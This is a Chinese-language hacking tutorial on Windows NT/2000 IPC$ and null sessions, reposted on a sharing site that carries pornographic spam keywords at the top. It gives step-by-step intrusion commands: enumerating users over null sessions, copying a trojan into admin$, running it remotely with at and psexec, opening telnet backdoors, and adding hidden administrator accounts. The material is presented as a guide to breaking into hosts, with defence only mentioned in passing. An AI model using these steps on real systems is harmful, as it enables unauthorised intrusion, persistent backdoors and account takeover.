国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開APP
userphoto
未登錄

開通VIP,暢享免費電子書等14項超值服

開通VIP
IPC$命令詳解(一)

一 摘要
二 什么是ipc$
三 什么是空會話
四 空會話可以做什么
五 ipc$所使用的端口
六 ipc管道在hack攻擊中的意義
七 ipc$連接失敗的常見原因
八 復(fù)制文件失敗的原因
九 關(guān)于at命令和xp對ipc$的限制
十 如何打開目標(biāo)的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能會用到的命令
十三 對比過去和現(xiàn)今的ipc$入侵
十四 如何防范ipc$入侵
十五 ipc$入侵問答精選

一 摘要
注意:本文所討論的各種情況均默認發(fā)生在win NT/2000環(huán)境下,win98將不在此次討論之列。

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進行加密數(shù)據(jù)的交換,從而實現(xiàn)對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特點,即在同一時間內(nèi),兩個IP之間只允許建立一個連接。
NT/2000在提供了ipc$功能的同時,在初次安裝系統(tǒng)時還打開了默認共享,即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導(dǎo)致了系統(tǒng)安全性的降低。
平時我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$并不是一個真正意義上的漏洞,我想之所以有人這么說,一定是指微軟自己安置的那個‘后門’:空會話(Null session)。那么什么是空會話呢?

三 什么是空會話
在介紹空會話之前,我們有必要了解一下一個安全會話是如何建立的。
在Windows NT 4.0中是使用挑戰(zhàn)響應(yīng)協(xié)議與遠程機器建立一個會話的,建立成功的會話將成為一個安全隧道,建立雙方通過它互通信息,這個過程的大致順序如下:
1)會話請求者(客戶)向會話接收者(服務(wù)器)傳送一個數(shù)據(jù)包,請求安全隧道的建立;
2)服務(wù)器產(chǎn)生一個隨機的64位數(shù)(實現(xiàn)挑戰(zhàn))傳送回客戶;
3)客戶取得這個由服務(wù)器產(chǎn)生的64位數(shù),用試圖建立會話的賬號的口令打亂它,將結(jié)果返回到服務(wù)器(實現(xiàn)響應(yīng));
4)服務(wù)器接受響應(yīng)后發(fā)送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應(yīng)以便確認請求者身份。如果請求者的賬號是服務(wù)器的本地賬號,核實本地發(fā)生;如果請求的賬號是一個域的賬號,響應(yīng)傳送到域控制器去核實。當(dāng)對挑戰(zhàn)的響應(yīng)核實為正確后,一個訪問令牌產(chǎn)生,然后傳送給客戶。客戶使用這個訪問令牌連接到服務(wù)器上的資源直到建議的會話被終止。

以上是一個安全會話建立的大致過程,那么空會話又如何呢?
空會話是在沒有信任的情況下與服務(wù)器建立的會話(即未提供用戶名與密碼),但根據(jù)WIN2000的訪問控制模型,空會話的建立同樣需要提供一個令牌,可是空會話在建立過程中并沒有經(jīng)過用戶信息的認證,所以這個令牌中不包含用戶信息,因此,這個會話不能讓系統(tǒng)間發(fā)送加密信息,但這并不表示空會話的令牌中不包含安全標(biāo)識符SID(它標(biāo)識了用戶和所屬組),對于一個空會話,LSA提供的令牌的SID是S-1-5-7,這就是空會話的SID,用戶名是:ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的,但是是不能在SAM數(shù)據(jù)庫中找到,屬于系統(tǒng)內(nèi)置的賬號),這個訪問令牌包含下面?zhèn)窝b的組:
Everyone
Network
在安全策略的限制下,這個空會話將被授權(quán)訪問到上面兩個組有權(quán)訪問到的一切信息。那么建立空會話到底可以作什么呢?

四 空會話可以做什么
對于NT,在默認安全設(shè)置下,借助空連接可以列舉目標(biāo)主機上的用戶和共享,訪問everyone權(quán)限的共享,訪問小部分注冊表等,并沒有什么太大的利用價值;對2000作用更小,因為在Windows 2000 和以后版本中默認只有管理員和備份操作員有權(quán)從網(wǎng)絡(luò)訪問到注冊表,而且實現(xiàn)起來也不方便,需借助工具。
從這些我們可以看到,這種非信任會話并沒有多大的用處,但從一次完整的ipc$入侵來看,空會話是一個不可缺少的跳板,因為我們從它那里可以得到戶列表,而大多數(shù)弱口令掃描工具就是利用這個用戶列表來進行口令猜解的,成功的導(dǎo)出用戶列表大大增加了猜解的成功率,僅從這一點,足以說明空會話所帶來的安全隱患,因此說空會話毫無用處的說法是不正確的。以下是空會話中能夠使用的一些具體命令:
1 首先,我們先建立一個空連接(當(dāng)然,這需要目標(biāo)開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use后面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \\ip
解釋:前提是建立了空連接后,用此命令可以查看遠程主機的共享資源,如果它開了共享,可以得到如下面的結(jié)果,但此命令不能顯示默認共享。
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當(dāng)前時間
命令: net time \\ip
解釋:用此命令可以得到一個遠程主機的當(dāng)前時間。
4 得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一個遠程主機的NetBIOS用戶名列表,返回如下結(jié)果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我們經(jīng)常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點:建立IPC$連接的操作會在Event Log中留下記錄,不管你是否登錄成功。 好了,那么下面我們就來看看ipc$所使用的端口是什么?
(其中<00>、<1C>是服務(wù)類型,Netbios的構(gòu)成是兩個部分,“名字+服務(wù)類型”)
 
五 ipc$所使用的端口
首先我們來了解一些基礎(chǔ)知識:
1 SMB Server Message Block) Windows協(xié)議族,用于文件打印共享的服務(wù);
2 NBT NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口實現(xiàn)基于TCP/IP協(xié)議的NETBIOS網(wǎng)絡(luò)互聯(lián)。
3 在WindowsNT中SMB基于NBT實現(xiàn),即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT實現(xiàn),還可以直接通過445端口實現(xiàn)。
有了這些基礎(chǔ)知識,我們就可以進一步來討論訪問網(wǎng)絡(luò)共享對端口的選擇了:
對于win2000客戶端(發(fā)起端)來說:
1 如果在允許NBT的情況下連接服務(wù)器時,客戶端會同時嘗試訪問139和445端口,如果445端口有響應(yīng),那么就發(fā)送RST包給139端口斷開連接,用455端口進行會話,當(dāng)445端口無響應(yīng)時,才使用139端口,如果兩個端口都沒有響應(yīng),則會話失??;
2 如果在禁止NBT的情況下連接服務(wù)器時,那么客戶端只會嘗試訪問445端口,如果445端口無響應(yīng),那么會話失敗。
 
對于win2000服務(wù)器端來說:
1 如果允許NBT, 那么UDP端口137, 138, TCP 端口 139, 445將開放(LISTENING);
2 如果禁止NBT,那么只有445端口開放。
我們建立的ipc$會話對端口的選擇同樣遵守以上原則。顯而易見,如果遠程服務(wù)器沒有監(jiān)聽139或445端口,ipc$會話是無法建立的。
六 ipc管道在hack攻擊中的意義
ipc管道本來是微軟為了方便管理員進行遠程管理而設(shè)計的,但在入侵者看來,開放ipc管道的主機似乎更容易得手。通過ipc管道,我們可以遠程調(diào)用一些系統(tǒng)函數(shù)(大多通過工具實現(xiàn),但需要相應(yīng)的權(quán)限),這往往是入侵成敗的關(guān)鍵。如果不考慮這些,僅從傳送文件這一方面,ipc管道已經(jīng)給了入侵者莫大的支持,甚至已經(jīng)成為了最重要的傳輸手段,因此你總能在各大論壇上看到一些朋友因為打不開目標(biāo)機器的ipc管道而一籌莫展大呼救命。當(dāng)然,我們也不能忽視權(quán)限在ipc管道中扮演的重要角色,想必你一定品嘗過空會話的尷尬,沒有權(quán)限,開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的權(quán)限,那么ipc管道這把雙刃劍將顯示出它猙獰的一面。
七 ipc$連接失敗的常見原因
以下是一些常見的導(dǎo)致ipc$連接失敗的原因:
1 IPC連接是Windows NT及以上系統(tǒng)中特有的功能,由于其需要用到Windows NT中很多DLL函數(shù),所以不能在Windows 9.x/Me系統(tǒng)中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個ipc$連接,就需要響應(yīng)方開啟ipc$共享,即使是空連接也是這樣,如果響應(yīng)方關(guān)閉了ipc$共享,將不能建立連接;
3 連接發(fā)起方未啟動Lanmanworkstation服務(wù)(顯示名為:Workstation):它提供網(wǎng)絡(luò)鏈結(jié)和通訊,沒有它發(fā)起方無法發(fā)起連接請求;
4 響應(yīng)方未啟動Lanmanserver服務(wù)(顯示名為:Server):它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依賴于此服務(wù),沒有它主機將無法響應(yīng)發(fā)起方的連接請求,不過沒有它仍可發(fā)起ipc$連接;
5 響應(yīng)方未啟動NetLogon,它支持網(wǎng)絡(luò)上計算機 pass-through 帳戶登錄身份(不過這種情況好像不多);
6 響應(yīng)方的139,445端口未處于監(jiān)聽狀態(tài)或被防火墻屏蔽;
7 連接發(fā)起方未打開139,445端口;
8 用戶名或者密碼錯誤:如果發(fā)生這樣的錯誤,系統(tǒng)將給你類似于'無法更新密碼'這樣的錯誤提示(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當(dāng)用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經(jīng)建立好連接的情況下對方重啟計算機,那么ipc$連接將會自動斷開,需要重新建立連接。
另外,你也可以根據(jù)返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員權(quán)限的;
錯誤號51,Windows無法找到網(wǎng)絡(luò)路徑:網(wǎng)絡(luò)有問題;
錯誤號53,找不到網(wǎng)絡(luò)路徑:ip地址錯誤;目標(biāo)未開機;目標(biāo)lanmanserver服務(wù)未啟動;目標(biāo)有防火墻(端口過濾);
錯誤號67,找不到網(wǎng)絡(luò)名:你的lanmanworkstation服務(wù)未啟動或者目標(biāo)刪除了ipc$;
錯誤號1219,提供的憑據(jù)與已存在的憑據(jù)集沖突:你已經(jīng)和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動:目標(biāo)NetLogon服務(wù)未啟動;
錯誤號2242,此用戶的密碼已經(jīng)過期:目標(biāo)有賬號策略,強制定期要求更改密碼。
 
八 復(fù)制文件失敗的原因
有些朋友雖然成功的建立了ipc$連接,但在copy時卻遇到了這樣那樣的麻煩,無法復(fù)制成功,那么導(dǎo)致復(fù)制失敗的常見原因又有哪些呢?
1 對方未開啟共享文件夾
這類錯誤出現(xiàn)的最多,占到50%以上。許多朋友在ipc$連接建立成功后,甚至都不知道對方是否有共享文件夾,就進行盲目復(fù)制,結(jié)果導(dǎo)致復(fù)制失敗而且郁悶的很。因此我建議大家在進行復(fù)制之前務(wù)必用net view \\IP這個命令看一下你想要復(fù)制的共享文件夾是否存在(用軟件查看當(dāng)然更好),不要認為能建立ipc$連接就一定有共享文件夾存在。
2 向默認共享復(fù)制失敗
這類錯誤也是大家經(jīng)常犯的,主要有兩個小方面:
1)錯誤的認為能建立ipc$連接的主機就一定開啟了默認共享,因而在建立完連接之后馬上向c$,d$,admin$之類的默認共享復(fù)制文件,一旦對方未開啟默認共享,將導(dǎo)致復(fù)制失敗。ipc$連接成功只能說明對方打開了ipc$共享,并不能說明默認共享一定存在。ipc$共享與默認共享是兩碼事,ipc$共享是一個命名管道,并不是哪個實際的文件夾,而默認共享卻是實實在在的共享文件夾;
2)由于net view \\IP 這個命令無法顯示默認共享文件夾(因為默認共享帶$),因此通過這個命令,我們并不能判斷對方是否開啟了默認共享,因此如果對方未開啟默認共享,那么所有向默認共享進行的操作都不能成功;(不過大部分掃描軟件在掃弱口令的同時,都能掃到默認共享目錄,可以避免此類錯誤的發(fā)生)
要點:請大家一定區(qū)分ipc共享,默認共享,普通共享這三者的區(qū)別:ipc共享是一個管道,并不是實際的共享文件夾;默認共享是安裝時默認打開的文件夾;普通共享是我們自己開啟的可以設(shè)置權(quán)限的共享文件夾。
3用戶權(quán)限不夠,包括四種情形:
1)空連接向所有共享(默認共享和普通共享)復(fù)制時,權(quán)限是不夠的;
2)向默認共享復(fù)制時,在Win2000 Pro版中,只有Administrators和Backup Operators組成員才可以,在Win2000 Server版本 Server Operatros組也可以訪問到這些共享目錄;
3)向普通共享復(fù)制時,要具有相應(yīng)權(quán)限(即對方管理員事先設(shè)定的訪問權(quán)限);
4)對方可以通過防火墻或安全軟件的設(shè)置,禁止外部訪問共享;
注意:
1 不要認為administrator就一定具有管理員權(quán)限,管理員名稱是可以改的
2 管理員可以訪問默認共享的文件夾,但不一定能夠訪問普通的共享文件夾,因為管理員可以對普通的共享文件夾進行訪問權(quán)限設(shè)置,如圖6,管理員為D盤設(shè)置的訪問權(quán)限為僅允許名為xinxin的用戶對該文件夾進行完全訪問,那么此時即使你擁有管理員權(quán)限,你仍然不能訪問D盤。不過有意思的是,如果此時對方又開啟了D$的默認共享,那么你卻可以訪問D$,從而繞過了權(quán)限限制,有興趣的朋友可以自己做測試。
4被防火墻殺死或在局域網(wǎng)
還有一種情況,那就是也許你的復(fù)制操作已經(jīng)成功,但當(dāng)遠程運行時,被防火墻殺掉了,導(dǎo)致找不到文件;或者你把木馬復(fù)制到了局域網(wǎng)內(nèi)的主機,導(dǎo)致連接失敗(反向連接的木馬不會發(fā)生這種情況)。如果你沒有想到這種情況,你會以為是復(fù)制上出了問題,但實際你的復(fù)制操作已經(jīng)成功了,只是運行時出了問題。
呵呵,大家也知道,ipc$連接在實際操作過程中會出現(xiàn)各種各樣的問題,上面我所總結(jié)的只是一些常見錯誤,沒說到的,大家可以給我提個醒兒。
 
九 關(guān)于at命令和xp對ipc$的限制
本來還想說一下用at遠程運行程序失敗的原因,但考慮到at的成功率不是很高,問題也很多,在這里就不提它了(提的越多,用的人就越多),而是推薦大家用psexec.exe遠程運行程序,假設(shè)想要遠程機器執(zhí)行本地
c:\xinxin.exe文件,且管理員為administrator,密碼為1234,那么輸入下面的命令:
psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe
如果已經(jīng)建立ipc連接,則-u -p這兩個參數(shù)不需要,psexec.exe將自動拷貝文件到遠程機器并運行。
本來xp中的ipc$也不想在這里討論,想單獨拿出來討論,但看到越來越多的朋友很急切的提問為什么遇到xp的時候,大部分操作都很難成功。我在這里就簡單提一下吧,在xp的默認安全選項中,任何遠程訪問僅被賦予來賓權(quán)限,也就是說即使你是用管理員帳戶和密碼,你所得到的權(quán)限也只是Guest,因此大部分操作都會因為權(quán)限不夠而失敗,而且到目前為止并沒有一個好的辦法來突破這一限制。所以如果你真的得到了xp的管理員密碼,我建議你盡量避開ipc管道。
 
十 如何打開目標(biāo)的IPC$共享以及其他共享
目標(biāo)的ipc$不是輕易就能打開的,否則就要天下打亂了。你需要一個admin權(quán)限的shell,比如telnet,木馬,cmd重定向等,然后在shell下執(zhí)行:
net share ipc$
開放目標(biāo)的ipc$共享;
net share ipc$ /del
關(guān)閉目標(biāo)的ipc$共享;如果你要給它開共享文件夾,你可以用:
net share xinxin=c:\
這樣就把它的c盤開為共享名為xinxin共享文件夾了。(可是我發(fā)現(xiàn)很多人錯誤的認為開共享文件夾的命令是net
share c$,還大模大樣的給菜鳥指指點點,真是誤人子弟了)。再次聲明,這些操作都是在shell下才能實現(xiàn)的
十一 一些需要shell才能完成的命令看到很多教程這方面寫的十分不準(zhǔn)確,一些需要shell才能完成命令就簡簡單單的在ipc$連接下執(zhí)行了,起了誤導(dǎo)作用。那么下面我總結(jié)一下需要在shell才能完成的命令:
1 向遠程主機建立用戶,激活用戶,修改用戶密碼,加入管理組的操作需要在shell下完成;
2 打開遠程主機的ipc$共享,默認共享,普通共享的操作需要在shell下完成;
3 運行/關(guān)閉遠程主機的服務(wù),需要在shell下完成;
4 啟動/殺掉遠程主機的進程,也需要在shell下完成(用軟件的情況下除外,如pskill)。

十二 入侵中可能會用到的命令
為了這份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已經(jīng)掌握了這些命令,你可以跳過這一部分看下面的內(nèi)容。請注意這些命令是適用于本地還是遠程,如果只適用于本地,你只能在獲得遠程主機的shell(如cmd,telnet等)后,才能向遠程主機執(zhí)行。
1 建立/刪除ipc$連接的命令
1)建立空連接:
net use \\127.0.0.1\ipc$ "" /user:""
2)建立非空連接:
net use \\127.0.0.1\ipc$ "密碼" /user:"用戶名"
3)刪除連接:
net use \\127.0.0.1\ipc$ /del
2 在ipc$連接中對遠程主機的操作命令
1) 查看遠程主機的共享資源(看不到默認共享):
net view \\127.0.0.1
2) 查看遠程主機的當(dāng)前時間:
net time \\127.0.0.1
3) 得到遠程主機的netbios用戶名列表:
nbtstat -A 127.0.0.1
4)映射/刪除遠程共享:
net use z: \\127.0.0.1\c
此命令將共享名為c的共享資源映射為本地z盤
net use z: /del
刪除映射的z盤,其他盤類推
5)向遠程主機復(fù)制文件:
copy 路徑\文件名 \\IP\共享目錄名,如:
copy c:\xinxin.exe \\127.0.0.1\c$ 即將c盤下的xinxin.exe復(fù)制到對方c盤內(nèi)
當(dāng)然,你也可以把遠程主機上的文件復(fù)制到自己的機器里:
copy \\127.0.0.1\c$\xinxin.exe c:\
6)遠程添加計劃任務(wù):
at \\IP 時間 程序名 如:
at \\127.0.0.0 11:00 xinxin.exe
注意:時間盡量使用24小時制;如果你打算運行的程序在系統(tǒng)默認搜索路徑(比如system32/)下則不用加路徑,否則必須加全路徑
3 本地命令
1)查看本地主機的共享資源(可以看到本地的默認共享)
net share
2)得到本地主機的用戶列表
net user
3)顯示本地某用戶的帳戶信息
net user 帳戶名
4)顯示本地主機當(dāng)前啟動的服務(wù)
net start
5)啟動/關(guān)閉本地服務(wù)
net start 服務(wù)名
net stop 服務(wù)名
6)在本地添加帳戶
net user 帳戶名 密碼 /add
7)激活禁用的用戶
net uesr 帳戶名 /active:yes
8)加入管理員組
net localgroup administrators 帳戶名 /add
很顯然的是,雖然這些都是本地命令,但如果你在遠程主機的shell中輸入,比如你telnet成功后輸入上面這些命
令,那么這些本地輸入將作用在遠程主機上。
4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23
2)用opentelnet.exe開啟遠程主機的telnet
OpenTelnet.exe \\ip 管理員賬號 密碼 NTLM的認證方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不過這個小工具需要滿足四個要求:
1)目標(biāo)開啟了ipc$共享
2)你要擁有管理員密碼和賬號
3)目標(biāo)開啟RemoteRegistry服務(wù),用戶就可以更改ntlm認證
4)對僅WIN2K/XP有效
3)用psexec.exe一步獲得shell,需要ipc管道支持
psexec.exe \\IP -u 管理員賬號 -p 密碼 cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
 
十三 對比過去和現(xiàn)今的ipc$入侵
既然是對比,那么我就先把過去的ipc$入侵步驟寫給大家,都是蠻經(jīng)典的步驟:
[1]
C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators
\\用掃到的空口令建立連接
[2]
c:\>net view \\127.0.0.1
\\查看遠程的共享資源
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\\將一次性后門srv.exe復(fù)制到對方的系統(tǒng)文件夾下,前提是admin$開啟
[4]
C:\>net time \\127.0.0.1
\\查看遠程主機的當(dāng)前時間
[5]
C:\>at \\127.0.0.1 時間 srv.exe
\\用at命令遠程運行srv.exe,需要對方開啟了'Task Scheduler'服務(wù)
[6]
C:\>net time \\127.0.0.1
\\再次查看當(dāng)前時間來估算srv.exe是否已經(jīng)運行,此步可以省略
[7]
C:\>telnet 127.0.0.1 99
\\開一個新窗口,用telnet遠程登陸到127.0.0.1從而獲得一個shell(不懂shell是什么意思?那你就把它想象成遠程機器的控制權(quán)就好了,操作像DOS),99端口是srv.exe開的一次性后門的端口
[8]
C:\WINNT\system32>net start telnet
\\我們在剛剛登陸上的shell中啟動遠程機器的telnet服務(wù),畢竟srv.exe是一次性的后門,我們需要一個長久的后門便于以后訪問,如果對方的telnet已經(jīng)啟動,此步可省略
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\\在原來那個窗口中將ntlm.exe傳過去,ntlm.exe是用來更改telnet身份驗證的
[10]
C:\WINNT\system32>ntlm.exe
\\在shell窗口中運行ntlm.exe,以后你就可以暢通無阻的telnet這臺主機了
[11]
C:\>telnet 127.0.0.1 23
\\在新窗口中telnet到127.0.0.1,端口23可省略,這樣我們又獲得一個長期的后門
[12]
C:\WINNT\system32>net user 帳戶名 密碼 /add
C:\WINNT\system32>net uesr guest /active:yes
C:\WINNT\system32>net localgroup administrators 帳戶名 /add
\\telnet上以后,你可以建立新帳戶,激活guest,把任何帳戶加入管理員組等
 
 
 
本站僅提供存儲服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊舉報
打開APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
IPC$命令詳解
網(wǎng)管和黑客都必須知道的命令
一份詳盡的IPC$入侵資料
DOS命令大全
net use命令詳解
Telnet高級入侵攻略
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長圖 關(guān)注 下載文章
綁定賬號成功
后續(xù)可登錄賬號暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點擊這里聯(lián)系客服!

聯(lián)系客服